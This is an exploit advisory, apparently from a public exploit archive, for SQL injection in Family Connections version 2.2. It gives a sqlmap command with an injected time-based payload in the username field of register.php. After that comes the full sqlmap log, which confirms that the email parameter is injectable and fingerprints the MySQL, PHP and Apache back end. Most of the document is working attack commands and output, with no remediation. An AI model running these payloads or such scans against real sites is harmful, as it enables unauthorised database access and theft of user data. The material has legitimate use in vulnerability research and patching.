# Exploit Title: Family Connections version 2.2 SQL Injection # Date: March 15, 2010 # Author: Blake # Software Link: http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.2/FCMS_2.2.zip/download # Version: version 2.2 # Tested on: Windows XP SP3 Multiple SQL Injection vulnerabilities are possible in the register.php and lostpw.php. Example with sqlmap against register.php: sqlmap -u "http://192.168.1.149/fcms/register.php" --method "POST" --data "username=%27+and+benchmark%2810000000%2CMD5%281%29%29%23&lname=on&fname=on&password=on&email=on&submit=Submit" sqlmap/0.6.4 coded by Bernardo Damele A. G. > and Daniele Bellucci > [*] starting at: 16:39:13 [16:39:13] [INFO] testing connection to the target url [16:39:41] [INFO] testing if the url is stable, wait a few seconds [16:40:37] [INFO] url is stable [16:40:37] [INFO] testing if POST parameter 'username' is dynamic [16:40:38] [WARNING] POST parameter 'username' is not dynamic [16:40:38] [INFO] testing if POST parameter 'submit' is dynamic [16:41:05] [WARNING] POST parameter 'submit' is not dynamic [16:41:05] [INFO] testing if POST parameter 'lname' is dynamic [16:41:33] [WARNING] POST parameter 'lname' is not dynamic [16:41:33] [INFO] testing if POST parameter 'fname' is dynamic [16:42:00] [WARNING] POST parameter 'fname' is not dynamic [16:42:00] [INFO] testing if POST parameter 'password' is dynamic [16:42:27] [WARNING] POST parameter 'password' is not dynamic [16:42:27] [INFO] testing if POST parameter 'email' is dynamic [16:42:57] [INFO] confirming that POST parameter 'email' is dynamic [16:43:57] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request [16:44:28] [INFO] POST parameter 'email' is dynamic [16:44:28] [INFO] testing sql injection on POST parameter 'email' with 0 parenthesis [16:44:28] [INFO] testing unescaped numeric injection on POST parameter 'email' [16:44:57] [INFO] POST parameter 'email' is not unescaped numeric injectable [16:44:57] [INFO] testing single quoted string injection on POST parameter 'email' [16:45:54] [INFO] confirming single quoted string injection on POST parameter 'email' [16:46:23] [INFO] POST parameter 'email' is single quoted string injectable with 0 parenthesis [16:46:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [16:46:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [16:46:50] [INFO] testing for parenthesis on injectable parameter [16:48:18] [INFO] the injectable parameter requires 0 parenthesis [16:48:18] [INFO] testing MySQL [16:48:46] [INFO] confirming MySQL [16:49:13] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1 [16:49:13] [INFO] retrieved: 5 [16:55:25] [INFO] performed 13 queries in 371 seconds [16:55:25] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS: MySQL >= 5.0.0 [*] shutting down at: 16:55:25